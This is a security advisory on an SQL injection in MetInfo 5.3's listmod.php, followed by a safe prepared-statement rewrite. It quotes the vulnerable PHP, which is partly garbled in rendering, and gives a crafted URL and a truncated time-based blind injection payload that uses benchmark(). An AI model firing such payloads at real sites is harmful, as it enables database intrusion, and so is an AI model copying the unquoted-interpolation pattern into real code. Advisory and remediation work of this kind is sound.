MetInfo 5.3 /include/global/listmod.php SQL injection

2015-09-07T00:00:00
ID SSV:89367
Type seebug
Reporter Root
Modified 2015-09-07T00:00:00

Description

Look at lines 164-184 of MetInfo5.3/include/global/listmod.php (most of the `$`-prefixed variable names were lost when this advisory was rendered; the ones the analysis below relies on are `$prices1`, `$prices`, `$prices_sql` and `$val2`):

```php
foreach( as =>$val2){
    $prices1="paraprice_".$val2['id'];
    $prices=$$prices1;
    var_dump($prices);
    if($prices){
        if(!strstr($prices, "-")){
            preg_match('/([0-9.]+)/',$prices,$prices_sql);
            $prices=$prices_sql[0];
            .= " and exists(select * from  where module=3 and .paraid='$val2[id]' and .listid=.id and .info > $prices) ";
            .= "&".$prices1."=".trim($$prices1);
        }else{
            //echo 3;
            $prices=explode('-',$prices);
            preg_match('/([0-9.]+)/',$prices[1],$prices_sql);
            =[0];
            .= " and exists(select * from  where module=3 and .paraid='$val2[id]' and .listid=.id and .info > [0] and .info < ) ";
            .= "&".$prices1."=".trim($$prices1);
        }
    }
}
```

Here `$prices_sql[0]` is never initialized and is not wrapped in single quotes, so it ends up in the query as raw SQL, but there is a logic check in front of it.

First, there is a variable override, `$prices=$$prices1;`, and the name it resolves, `paraprice_".$val2['id']`, is under our control.

So all that is needed is to construct a URL like the following:

```
?search=search&mdmendy=1&paraprice_14=tomato-xxxx&mdname=product
```

payload:

```
?search=search&mdmendy=1&paraprice_14=1) or if(ascii(mid(user(),1,1))=114,benchmark(10000000,
```
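The root cause above is a filter value that is only loosely matched with `preg_match('/([0-9.]+)/')` and then interpolated unquoted, so an input that does not match (or a range such as `tomato-xxxx`) reaches the query unvalidated. The following is an added example of how the same `paraprice_<id>` range filter can be handled safely; it is not MetInfo's own code, and the table and column names (`param_value`, `product_list`, `pv.info`) and the DSN are placeholders, not MetInfo's schema.

```php
<?php
// Added example, not MetInfo's code. Table/column names and the DSN are
// placeholders chosen for illustration only.

/**
 * Parse a price filter of the form "10", "10.5" or "10-20" into floats.
 * Anything else is rejected outright (null) instead of falling through
 * with an undefined $prices_sql[0] the way the vulnerable listing does.
 */
function parsePriceFilter(string $raw): ?array
{
    $raw = trim($raw);
    // Anchored: exactly one or two non-negative decimals, optionally split by "-".
    if (!preg_match('/^(\d+(?:\.\d+)?)(?:-(\d+(?:\.\d+)?))?$/', $raw, $m)) {
        return null;
    }
    $min = (float)$m[1];
    // PHP drops trailing non-participating groups, so isset() detects a single value.
    $max = isset($m[2]) ? (float)$m[2] : null;
    if ($max !== null && $max < $min) {
        return null; // inverted range: reject rather than guess the intent
    }
    return ['min' => $min, 'max' => $max];
}

/**
 * Build the EXISTS clause with placeholders only. User-derived values never
 * touch the SQL string; they are appended to $params and bound by PDO.
 */
function buildPriceClause(int $paraId, array $filter, array &$params): string
{
    $params[] = $paraId;
    $params[] = $filter['min'];
    $sql = " and exists(select 1 from param_value pv"
         . " where pv.module=3 and pv.paraid=? and pv.listid=l.id and pv.info > ?";
    if ($filter['max'] !== null) {
        $sql .= " and pv.info < ?";
        $params[] = $filter['max'];
    }
    return $sql . ")";
}

/**
 * Assemble the full query for one parameter id from a raw request value.
 * Returns null when the value is not a well-formed price or range.
 */
function buildProductQuery(int $paraId, string $rawFilter, array &$params): ?string
{
    $filter = parsePriceFilter($rawFilter);
    if ($filter === null) {
        return null;
    }
    $params = [];
    return "select l.id from product_list l where 1=1"
         . buildPriceClause($paraId, $filter, $params);
}

// Constructed inputs, including the advisory's "tomato-xxxx" and the start
// of its payload; only the first two are accepted.
foreach (['12', '10.5-20', 'tomato-xxxx', '1) or if(1=1,1,0)'] as $input) {
    $f = parsePriceFilter($input);
    echo str_pad($input, 20), ' => ', $f === null ? 'rejected' : json_encode($f), "\n";
}

// Prepared-statement execution (DSN/credentials are placeholders).
// $pdo = new PDO('mysql:host=localhost;dbname=placeholder', 'user', 'pass');
// $params = [];
// $sql = buildProductQuery(14, $_GET['paraprice_14'] ?? '', $params);
// if ($sql !== null) { $stmt = $pdo->prepare($sql); $stmt->execute($params); }
```

The anchored regex does the work the original `/([0-9.]+)/` cannot: it refuses to extract a number from the middle of an arbitrary string, so the "no match, undefined index" path never exists, and because the numbers are bound as parameters rather than concatenated, even a well-formed value cannot alter the statement.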